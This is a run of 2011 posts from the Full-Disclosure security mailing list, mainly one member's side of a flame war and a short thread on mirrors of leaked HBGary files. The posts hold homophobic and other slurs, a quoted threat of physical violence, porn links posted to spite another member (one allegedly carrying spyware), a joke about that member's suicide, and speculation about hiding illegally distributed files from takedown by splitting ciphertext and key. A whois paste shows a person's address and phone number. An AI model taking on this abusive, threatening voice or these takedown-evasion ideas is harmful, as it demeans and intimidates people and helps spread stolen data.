> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > Andrew, I used to fucking work in a NOC as a security consultant you
> idiotic
> > piece of shit. I also used to spend 12 - 18 hours a day in various
> > data centres in Harbour Exchange.
> > Go and check my linkedin.
>
> May I enquire, have you been drinking at home lately or suffering from
> behavioural problems or mood swings? This would tally in with your postings
> lately. I assure you no one recruiting at the moment would let you inside an
> operations centre in your current state of mind. Sort yourself out and stop
> coming on the disclosure community and spamming your LinkedIn profile into
> everyones inboxes and expecting to be headhunted.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: HBGary Mirrors?

[Cal Leeming [Simplicity Media Ltd]]

LMAO, that's fucking brilliant. :D

(had to modify the reply a little, Google was picking it up as spam, and
forcibly not sending out :S)

On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

>
>
>
>> On Fri, Feb 18, 2011 at 7:33 PM, Veg <*> wrote:
>>
>>> Pertaining to your question about the key versus the cryptotext:
>>>
>>> *http://bit.ly/hSmqvA*
>>>
>>>
>>>
>>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HBGary Mirrors?

[Cal Leeming [Simplicity Media Ltd]]

Oh, I didn't realise that's what FreeNet did, I thought it was a tor
alternative!

On Fri, Feb 18, 2011 at 7:28 PM,  wrote:

> On Fri, 18 Feb 2011 18:37:09 GMT, "Cal Leeming [Simplicity Media Ltd]"
> said:
> > If illegally distributed files (such as this one) were encrypted and
> hosted
> > on one server, and the key hosted on another, which server would
> > be eligible for take down?
>
> Questions like that are part of why FreeNet and similar systems were
> designed.
> Nobody wants to be the test case for a simple question like that one,
> because
> even if you win the test case, it still sucks.  So the obvious thing to do
> is
> fix things so the simple questions aren't an issue anymore, with the hope
> that
> the hard questions remain un-askable.
>
> When even the person who stored the file can't tell where the file is, and
> the admin of each participating server has no way of telling what got
> stored
> on their node, it becomes really hard to draft a proper legal notice
> (either
> a 17 USC 512 takedown notice, or subpoenas/warrants for more serious
> stuff).
>
>
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

Andrew, I used to fucking work in a NOC as a security consultant you idiotic
piece of shit. I also used to spend 12 - 18 hours a day in various
data centres in Harbour Exchange.

Go and check my linkedin.

Oh and, as promised: http://bit.ly/eQIk4O



On Fri, Feb 18, 2011 at 7:22 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Fri, Feb 18, 2011 at 4:50 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > "operations centre email system"
>
> When you ever get a job in the industry, which is unlikely because of your
> criminal record you might get to know what an operations centre is.
>
> http://en.wikipedia.org/wiki/Network_operations_center
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: HBGary Mirrors?

[Cal Leeming [Simplicity Media Ltd]]

I'm wondering along the same lines as Thor, based on intent. One of those
"don't take the piss or the judge is gonna own you" scenarios that would be
tested in court on a per trial basis. Like, if the files were known to
contain encrypted info, and if it was proved that you knew the contents of
those files, then you would be held liable.

@Charles: luckily for me, this is all academic as I've kept as far away as
possible from this hbgary thing :P

On Fri, Feb 18, 2011 at 6:57 PM, Charles Morris  wrote:

> > Sorry, when I say eligible, I mean "which server would they be allowed to
> > take down by law?".
> > I'm not too hot on the laws of encryption, but I'm sure there is
> something
> > which states that hosting encrypted files are not illegal, it's
> distributing
> > the key which allows you to gain access to those fails, which is actually
> > illegal.
> > *DISCLAIMER: I don't know if the above is true or not, so apologies if I
> got
> > this wrong*
> >
>
> Attempt A:
> Cal, I'm not sure on this point off-the-cuff, however encrypted files
> should* be
> indistinguishable from random data, so assuming that even if a given LEE
> has obtained the key and knows that your distributed data is "illegal", you
> could be held blameless as you have no feasible way to know what the data
> was.
>
> Attempt 2:
> You could also consider a key and an algorithm a "transform" for a set of
> random
> bits, such that once the transform is applied to those bits it would
> result in something
> "bad", so you aren't actually distributing "encrypted" "files" at all..
>
> just random bits :D
>
> *DISCLAIMER: The above will PROBABLY NOT hold in court, so apologies
> if you get jailed for life
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: HBGary Mirrors?

[Cal Leeming [Simplicity Media Ltd]]

Heh, now that would be interesting. I wonder if the "intent" scenario would
apply to this also?

On Fri, Feb 18, 2011 at 6:56 PM, decoder  wrote:

>  I can't answer the question but it would be even more interesting to
> answer this if you're using a One-Time-Pad (i.e. two files of equal size on
> two different servers, both XORed give you the data). There exists a
> mathematical proof that none of the two files leak a single bit of
> information of the original data :)
>
>
> Chris
>
>
>
> On 02/18/2011 07:50 PM, Cal Leeming [Simplicity Media Ltd] wrote:
>
> Sorry, when I say eligible, I mean "which server would they be allowed to
> take down by law?".
>
>  I'm not too hot on the laws of encryption, but I'm sure there is
> something which states that hosting encrypted files are not illegal, it's
> distributing the key which allows you to gain access to those fails, which
> is actually illegal.
>
>  *DISCLAIMER: I don't know if the above is true or not, so apologies if I
> got this wrong*
>
>
> On Fri, Feb 18, 2011 at 6:46 PM, ck  wrote:
>
> I go with the server hosting the files since the key should be
> significant smaller than the files and therefor much easier to mirror.
>
> On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd]
>  wrote:
> > So here's a thought.
> > If illegally distributed files (such as this one) were encrypted and
> hosted
> > on one server, and the key hosted on another, which server would
> > be eligible for take down?
> >
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fwd: HBGary Mirrors?

[Cal Leeming [Simplicity Media Ltd]]

Sorry, when I say eligible, I mean "which server would they be allowed to
take down by law?".

I'm not too hot on the laws of encryption, but I'm sure there is something
which states that hosting encrypted files are not illegal, it's distributing
the key which allows you to gain access to those fails, which is actually
illegal.

*DISCLAIMER: I don't know if the above is true or not, so apologies if I got
this wrong*


On Fri, Feb 18, 2011 at 6:46 PM, ck  wrote:

> I go with the server hosting the files since the key should be
> significant smaller than the files and therefor much easier to mirror.
>
> On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd]
>  wrote:
> > So here's a thought.
> > If illegally distributed files (such as this one) were encrypted and
> hosted
> > on one server, and the key hosted on another, which server would
> > be eligible for take down?
> >
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HBGary Mirrors?

[Cal Leeming [Simplicity Media Ltd]]

So here's a thought.

If illegally distributed files (such as this one) were encrypted and hosted
on one server, and the key hosted on another, which server would
be eligible for take down?

On Fri, Feb 18, 2011 at 6:25 PM, Eyeballing Weev
wrote:

> Cryptome.org is your friend. John Young is pretty much bulletproof when
> it comes to file hosting and laughs at DMCA takedown requests.
>
> On 02/18/2011 11:24 AM, ck wrote:
> > So, the FEDs shut down all mirrors of the HBGary files - or didn't they?
> >
> > ck
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

"operations centre email system"

LMFAO.

You know what that reminds me of? The fat cunt in Die Hard 3 when he says
"WHAT ARE YOU DOING IN MY COMMAND CENTRE".

Ty for that, just made my day :D

On Fri, Feb 18, 2011 at 4:46 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Fri, Feb 18, 2011 at 4:40 PM, Benji  wrote:
> > This email thread is fucking ridiculous and boring, take it off list or
> > whatever, I dont care, just stop filling up my inbox with your worthless
> > ramblings about porn and battlefrogs 2142.
>
> Like I've been telling him for the last two weeks, our operations centre
> email system is full of his junk mail.
>
> We just want Cal removed from the list, its that simple... its not a chat
> forum.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

Shut the fuck up Benji and spam block my email if you're *that* bothered :)

On Fri, Feb 18, 2011 at 4:40 PM, Benji  wrote:

> This email thread is fucking ridiculous and boring, take it off list or
> whatever, I dont care, just stop filling up my inbox with your worthless
> ramblings about porn and battlefrogs 2142.
>
>
> On Fri, Feb 18, 2011 at 4:34 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> LOL why? bf2142 is pretty decent, helps me unwind, else I end up coding
>> all day, every day, whilst not giving my brain chance to dissect the days
>> events. People have different release methods, some go out drinking every
>> weekend, some drink alcohol at home, some smoke a joint. My release is porn
>> and gaming, it's a hell of a lot healthier than most :D Hell, if I had the
>> time, I'd go military themed airsoft'ing every weekend, but I haven't
>> convinced my girl to go with me yet lol.
>>
>> On Fri, Feb 18, 2011 at 4:28 PM, Christian Sciberras 
>> wrote:
>>
>>> Battlefield 2142? That's it, you're hopeless.
>>>
>>>
>>>
>>>
>>>
>>> On Fri, Feb 18, 2011 at 5:24 PM, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>
>>>> When it comes to porn, trance, battlefield 2142, coding and sex? No.
>>>> lol.
>>>>
>>>> On Fri, Feb 18, 2011 at 4:22 PM, Paul Schmehl >>> > wrote:
>>>>
>>>>> Ever heard of self control?
>>>>>
>>>>>
>>>>> --On February 18, 2011 12:41:27 PM + "Cal Leeming [Simplicity Media
>>>>> Ltd]"  wrote:
>>>>>
>>>>>
>>>>>> I do see where you are coming from, I really do. But right now, full
>>>>>> disclosure seems to be about whatever anyone wants it to be about.
>>>>>>
>>>>>>
>>>>>> Until this list becomes moderated, the only control any of us have
>>>>>> over
>>>>>> its content, is to block individuals whom we don't wish to receive
>>>>>> mail
>>>>>> from.
>>>>>>
>>>>>
>>>>> --
>>>>> Paul Schmehl, Senior Infosec Analyst
>>>>> As if it wasn't already obvious, my opinions
>>>>> are my own and not those of my employer.
>>>>> ***
>>>>> "It is as useless to argue with those who have
>>>>> renounced the use of reason as to administer
>>>>> medication to the dead." Thomas Jefferson
>>>>> "There are some ideas so wrong that only a very
>>>>> intelligent person could believe in them." George Orwell
>>>>>
>>>>>
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

LOL why? bf2142 is pretty decent, helps me unwind, else I end up coding all
day, every day, whilst not giving my brain chance to dissect the days
events. People have different release methods, some go out drinking every
weekend, some drink alcohol at home, some smoke a joint. My release is porn
and gaming, it's a hell of a lot healthier than most :D Hell, if I had the
time, I'd go military themed airsoft'ing every weekend, but I haven't
convinced my girl to go with me yet lol.

On Fri, Feb 18, 2011 at 4:28 PM, Christian Sciberras wrote:

> Battlefield 2142? That's it, you're hopeless.
>
>
>
>
>
> On Fri, Feb 18, 2011 at 5:24 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> When it comes to porn, trance, battlefield 2142, coding and sex? No. lol.
>>
>> On Fri, Feb 18, 2011 at 4:22 PM, Paul Schmehl 
>> wrote:
>>
>>> Ever heard of self control?
>>>
>>>
>>> --On February 18, 2011 12:41:27 PM + "Cal Leeming [Simplicity Media
>>> Ltd]"  wrote:
>>>
>>>
>>>> I do see where you are coming from, I really do. But right now, full
>>>> disclosure seems to be about whatever anyone wants it to be about.
>>>>
>>>>
>>>> Until this list becomes moderated, the only control any of us have over
>>>> its content, is to block individuals whom we don't wish to receive mail
>>>> from.
>>>>
>>>
>>> --
>>> Paul Schmehl, Senior Infosec Analyst
>>> As if it wasn't already obvious, my opinions
>>> are my own and not those of my employer.
>>> ***
>>> "It is as useless to argue with those who have
>>> renounced the use of reason as to administer
>>> medication to the dead." Thomas Jefferson
>>> "There are some ideas so wrong that only a very
>>> intelligent person could believe in them." George Orwell
>>>
>>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

When it comes to porn, trance, battlefield 2142, coding and sex? No. lol.

On Fri, Feb 18, 2011 at 4:22 PM, Paul Schmehl wrote:

> Ever heard of self control?
>
>
> --On February 18, 2011 12:41:27 PM + "Cal Leeming [Simplicity Media
> Ltd]"  wrote:
>
>
>> I do see where you are coming from, I really do. But right now, full
>> disclosure seems to be about whatever anyone wants it to be about.
>>
>>
>> Until this list becomes moderated, the only control any of us have over
>> its content, is to block individuals whom we don't wish to receive mail
>> from.
>>
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> ***
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
> "There are some ideas so wrong that only a very
> intelligent person could believe in them." George Orwell
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

He always seems to manage to hustle a response out of people though, and has
done since what, 2006-ish? (way before I came onto the list!)

So far he hasn't bothered to badger at the porn posts, because I think he
just doesn't know what to say, it's outside of his comfort zone or
something. Hell it's been 24 hours almost and we haven't heard from him, I'm
getting worried, maybe he's committed suicide :O

On Fri, Feb 18, 2011 at 3:44 PM, <0...@phocean.net> wrote:

> Maybe let's just ignore him ?
> I believe if no one cared at all about what he writes, such a troll
> wouldn't exist.
>
>
> On Fri, 18 Feb 2011 12:41:27 +, Cal Leeming [Simplicity Media Ltd]
> wrote:
>
>> I do see where you are coming from, I really do. But right now, full
>> disclosure seems to be about whatever anyone wants it to be about.
>>
>> Until this list becomes moderated, the only control any of us have over
>> its
>> content, is to block individuals whom we don't wish to receive mail from.
>>
>> Although, Andrew is an exception to this theory, as no one seems to block
>> him. Therefore, my "every cloud has a silver lining" approach seems to be
>> a
>> suitable solution.
>>
>> If you have any better ideas, let's hear em.
>>
>>
>> On Fri, Feb 18, 2011 at 7:18 AM, phocean <0...@phocean.net> wrote:
>>
>>  Then it is their problem but I did not click on any and I am sure (and I
>>> hope) I am not alone.
>>> But I don't even want to debate about it.
>>>
>>> The question is that simple: is FD about security or about porn?
>>>
>>> There are enough porn sites everywhere for people who want porn so I
>>> don't think it is necessary to offend some people here with it (even if
>>> we were minority).
>>>
>>> Le jeudi 17 février 2011 à 22:59 +, Cal Leeming [Simplicity Media
>>> Ltd] a écrit :
>>> > You do realize that those bit.ly links I posted have had over 200
>>> > clicks on each one, right? (Go check it for yourself if you don't
>>> > believe me)
>>> >
>>> >
>>> > Looks to me like the majority of people on this forum would rather see
>>> > porn, than listen to Andrew's shit.
>>> >
>>> > On Thu, Feb 17, 2011 at 9:44 PM, phocean <0...@phocean.net> wrote:
>>> > I never thought I would agree with Andrew some day, but that's
>>> > done.
>>> >     Don't you understand that you are killing FD or is it what you
>>> > want?
>>> > We are not here for porn! You may be sick and think like
>>> > anyone is like
>>> > you, but believe me, there are people who don't want of it and
>>> > live very
>>> > well without. So respect others and stop this madness.
>>> > By the way, who asked for moderation recently ?
>>> >
>>> > Le jeudi 17 février 2011 à 20:13 +, Cal Leeming
>>> > [Simplicity Media
>>> > Ltd] a écrit :
>>> >
>>> > > True to my word, here is the first (hopefully of many)
>>> > "every cloud
>>> > > has a silver lining" posts. (everytime Andrew posts more
>>> > faggotry, I
>>> > > will treat you all to decent porn!)
>>> > >
>>> > >
>>> > > I present to you, Gagging Report videos (user submitted!)
>>> > >
>>> > >
>>> > > http://bit.ly/fneO2U
>>> > >
>>> > >
>>> > > Enjoy!
>>> > >
>>> > > On Thu, Feb 17, 2011 at 8:09 PM, andrew.wallace
>>> > >  wrote:
>>> > > Just do yourself a favour, leave the disclosure
>>> > community for
>>> > > good like you've been requested so many times to do.
>>> > >
>>> > > Myself and any law enforcement folks reading the
>>> > list won't
>>> > > bother pursuing your threats of violence further if
>>> > you stop
>>> > > now.
>>> > >
>>> > > It's your choice, the ball i

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

I do see where you are coming from, I really do. But right now, full
disclosure seems to be about whatever anyone wants it to be about.

Until this list becomes moderated, the only control any of us have over its
content, is to block individuals whom we don't wish to receive mail from.

Although, Andrew is an exception to this theory, as no one seems to block
him. Therefore, my "every cloud has a silver lining" approach seems to be a
suitable solution.

If you have any better ideas, let's hear em.


On Fri, Feb 18, 2011 at 7:18 AM, phocean <0...@phocean.net> wrote:

> Then it is their problem but I did not click on any and I am sure (and I
> hope) I am not alone.
> But I don't even want to debate about it.
>
> The question is that simple: is FD about security or about porn?
>
> There are enough porn sites everywhere for people who want porn so I
> don't think it is necessary to offend some people here with it (even if
> we were minority).
>
> Le jeudi 17 février 2011 à 22:59 +, Cal Leeming [Simplicity Media
> Ltd] a écrit :
> > You do realize that those bit.ly links I posted have had over 200
> > clicks on each one, right? (Go check it for yourself if you don't
> > believe me)
> >
> >
> > Looks to me like the majority of people on this forum would rather see
> > porn, than listen to Andrew's shit.
> >
> > On Thu, Feb 17, 2011 at 9:44 PM, phocean <0...@phocean.net> wrote:
> > I never thought I would agree with Andrew some day, but that's
> > done.
> > Don't you understand that you are killing FD or is it what you
> > want?
> > We are not here for porn! You may be sick and think like
> > anyone is like
> > you, but believe me, there are people who don't want of it and
> >     live very
> > well without. So respect others and stop this madness.
> > By the way, who asked for moderation recently ?
> >
> > Le jeudi 17 février 2011 à 20:13 +, Cal Leeming
> > [Simplicity Media
> > Ltd] a écrit :
> >
> > > True to my word, here is the first (hopefully of many)
> > "every cloud
> > > has a silver lining" posts. (everytime Andrew posts more
> > faggotry, I
> > > will treat you all to decent porn!)
> > >
> > >
> > > I present to you, Gagging Report videos (user submitted!)
> > >
> > >
> > > http://bit.ly/fneO2U
> > >
> > >
> > > Enjoy!
> > >
> > > On Thu, Feb 17, 2011 at 8:09 PM, andrew.wallace
> > >  wrote:
> > > Just do yourself a favour, leave the disclosure
> > community for
> > > good like you've been requested so many times to do.
> > >
> > > Myself and any law enforcement folks reading the
> > list won't
> > > bother pursuing your threats of violence further if
> > you stop
> > > now.
> > >
> > > It's your choice, the ball is completely in your
> > court in
> > > which direction you wish to go in life from now
> > onwards.
> > >
> > > You can stop posting now and get on with the rest of
> > your
> > > career, or you can continue on this same path.
> > >
> > > This list isn't a joke around like you seem to treat
> > it, we
> > > are serious people with serious concerns.
> > >
> > > Andrew
> > >
> > > On Thu, Feb 17, 2011 at 6:24 PM, Cal Leeming
> > [Simplicity Media
> > > Ltd]  wrote:
> > > > Prominent figure? LMFAO.
> > >
> > > >>
> > > >> On Thu, Feb 17, 2011 at 6:19 PM, andrew.wallace
> > > >>  wrote:
> > > >>>
> > > >>> On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming
> >         [Simplicity
> > > Media Ltd]
> > > >>>  wrote:
> > > >>> > Ah, now this is a different subject entirely

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

Uh, go and do a whois on the office gw and the IP space it's attached to,
and you'll quickly see that this is actually me talking lol.

 f...@courtney.simplicitymedialtd.co.uk [/mnt/encstore/lxc] > host
staff.simplicitymedialtd.co.uk
staff.simplicitymedialtd.co.uk has address 94.76.199.238

 f...@courtney.simplicitymedialtd.co.uk [/mnt/encstore/lxc] > whois
94.76.199.238
% This is the RIPE Database query service.
% The objects are in RPSL format.
inetnum:94.76.199.238 - 94.76.199.238
netname:SimplictyMedia-5133
descr:  Simplicty Media Ltd
remarks: ##
remarks:Please report abuse incidents to
ab...@simplicitymedialtd.co.uk.
remarks:Messages sent to other contact addresses may not be acted
upon.
remarks: ##
person: Cal Leeming
address:Abbey House
address:Manor Road
address:Coventry
address:CV1 2FW
phone:  +44 07534 971120
mnt-by: as29550-mnt
remarks:===
remarks:For abuse related queries, please email
remarks:ab...@simplicitymedialtd.co.uk
remarks:===


On Thu, Feb 17, 2011 at 10:04 PM,  wrote:

> On Thu, 17 Feb 2011 22:44:37 +0100, phocean said:
> > I never thought I would agree with Andrew some day, but that's done.
> > Don't you understand that you are killing FD or is it what you want?
>
> You *do* realize we have very little proof that the entity posting
> as Cal isn't a sock puppet of Andrew's creation, to further his vendetta
> against full disclosure because it helps the cyber-terrorists?  It's the
> sort of thing that one of England's top cyber-security experts would do,
> isn't it? :)
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

You do realize that those bit.ly links I posted have had over 200 clicks on
each one, right? (Go check it for yourself if you don't believe me)

Looks to me like the majority of people on this forum would rather see porn,
than listen to Andrew's shit.

On Thu, Feb 17, 2011 at 9:44 PM, phocean <0...@phocean.net> wrote:

> I never thought I would agree with Andrew some day, but that's done.
> Don't you understand that you are killing FD or is it what you want?
> We are not here for porn! You may be sick and think like anyone is like
> you, but believe me, there are people who don't want of it and live very
> well without. So respect others and stop this madness.
> By the way, who asked for moderation recently ?
>
> Le jeudi 17 février 2011 à 20:13 +, Cal Leeming [Simplicity Media
> Ltd] a écrit :
> > True to my word, here is the first (hopefully of many) "every cloud
> > has a silver lining" posts. (everytime Andrew posts more faggotry, I
> > will treat you all to decent porn!)
> >
> >
> > I present to you, Gagging Report videos (user submitted!)
> >
> >
> > http://bit.ly/fneO2U
> >
> >
> > Enjoy!
> >
> > On Thu, Feb 17, 2011 at 8:09 PM, andrew.wallace
> >  wrote:
> > Just do yourself a favour, leave the disclosure community for
> > good like you've been requested so many times to do.
> >
> > Myself and any law enforcement folks reading the list won't
> > bother pursuing your threats of violence further if you stop
> > now.
> >
> > It's your choice, the ball is completely in your court in
> > which direction you wish to go in life from now onwards.
> >
> > You can stop posting now and get on with the rest of your
> > career, or you can continue on this same path.
> >
> > This list isn't a joke around like you seem to treat it, we
> > are serious people with serious concerns.
> >
> > Andrew
> >
> > On Thu, Feb 17, 2011 at 6:24 PM, Cal Leeming [Simplicity Media
> > Ltd]  wrote:
> > > Prominent figure? LMFAO.
> >
> > >>
> > >> On Thu, Feb 17, 2011 at 6:19 PM, andrew.wallace
> > >>  wrote:
> > >>>
> > >>> On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming [Simplicity
> > Media Ltd]
> > >>>  wrote:
> > >>> > Ah, now this is a different subject entirely! It suits
> >     some, but not
> > >>> > others.
> > >>>
> > >>> Are you trying to distract the many police forces
> > throughout the UK who
> > >>> are subscribed to the list that you made a threat of
> > violence towards a
> > >>> prominent figure in the security community?
> > >>>
> > >>> On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity
> > Media Ltd]
> > >>>  wrote:
> > >>> > I hope you turn up at my next conference, so I can slap
> > the fuck out of
> > >>> > you
> > >>> > in front of everyone.
> > >>> > Little bitch like you would probably go running to the
> > police as well.
> > >>>
> > >>> Obviously, criminals are reported to the police. The
> > problem here is,
> > >>> this list is already populated with police forces
> > throughout the UK.
> > >>>
> > >>> They may even ask me to attend the next conference you
> > appear at, and
> > >>> then cuff you as soon as you lay a hand on me.
> > >>>
> > >>> Cal Leeming, the so-called reformed criminal ends up back
> > in court and
> > >>> infront of the media glare.
> > >>>
> > >>> Andrew
> >
> >
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

Ah, yeah motherless aren't very careful with who they allow to advertise on
the site. A decent IDS (Avira on Windows is pretty good) usually stops most
of the nasty drive by kits that end up in there.

2011/2/17 Thor (Hammer of God) 

>  Nice.  Now you are attempting to distribute “Pornpop.A” spyware to us?
> Arse!
>
> t
>
>
>
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Cal Leeming
> [Simplicity Media Ltd]
> *Sent:* Thursday, February 17, 2011 12:36 PM
> *To:* andrew.wallace
>
> *Cc:* full-disclosure@lists.grok.org.uk
> *Subject:* Re: [Full-disclosure] (this thread is now about porn).‏
>
>
>
> LOL, Andrew at this rate this is gonna turn into full-*dick*losure!
>
>
>
> Here you go /b/rothers:
>
>
>
> http://bit.ly/g4DUr5
>
>
>
> Red head, 19f, not the prettiest painting, but a damn good show.
>
> On Thu, Feb 17, 2011 at 8:30 PM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
> On Thu, Feb 17, 2011 at 8:13 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > True to my word, here is the first (hopefully of many) "every cloud has a
> > silver lining" posts. (everytime Andrew posts more faggotry, I will treat
> > you all to decent porn!)
> > I present to you, Gagging Report videos (user submitted!)
> > http://bit.ly/fneO2U
> > Enjoy!
> >
>
> You're just going to end up being arrested for not only making a threat of
> violence, but also spamming the list with unsolicited porn.
>
> I was throwing you a life line but you chose to throw it back in our faces.
>
> Andrew
>
>
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

LOL, Andrew at this rate this is gonna turn into full-*dick*losure!

Here you go /b/rothers:

http://bit.ly/g4DUr5

Red head, 19f, not the prettiest painting, but a damn good show.

On Thu, Feb 17, 2011 at 8:30 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 8:13 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > True to my word, here is the first (hopefully of many) "every cloud has a
> > silver lining" posts. (everytime Andrew posts more faggotry, I will treat
> > you all to decent porn!)
> > I present to you, Gagging Report videos (user submitted!)
> > http://bit.ly/fneO2U
> > Enjoy!
> >
>
> You're just going to end up being arrested for not only making a threat of
> violence, but also spamming the list with unsolicited porn.
>
> I was throwing you a life line but you chose to throw it back in our faces.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

True to my word, here is the first (hopefully of many) "every cloud has a
silver lining" posts. (everytime Andrew posts more faggotry, I will treat
you all to decent porn!)

I present to you, Gagging Report videos (user submitted!)

http://bit.ly/fneO2U

Enjoy!

On Thu, Feb 17, 2011 at 8:09 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> Just do yourself a favour, leave the disclosure community for good like
> you've been requested so many times to do.
>
> Myself and any law enforcement folks reading the list won't bother pursuing
> your threats of violence further if you stop now.
>
> It's your choice, the ball is completely in your court in which direction
> you wish to go in life from now onwards.
>
> You can stop posting now and get on with the rest of your career, or you
> can continue on this same path.
>
> This list isn't a joke around like you seem to treat it, we are serious
> people with serious concerns.
>
> Andrew
>
> On Thu, Feb 17, 2011 at 6:24 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > Prominent figure? LMFAO.
>
> >>
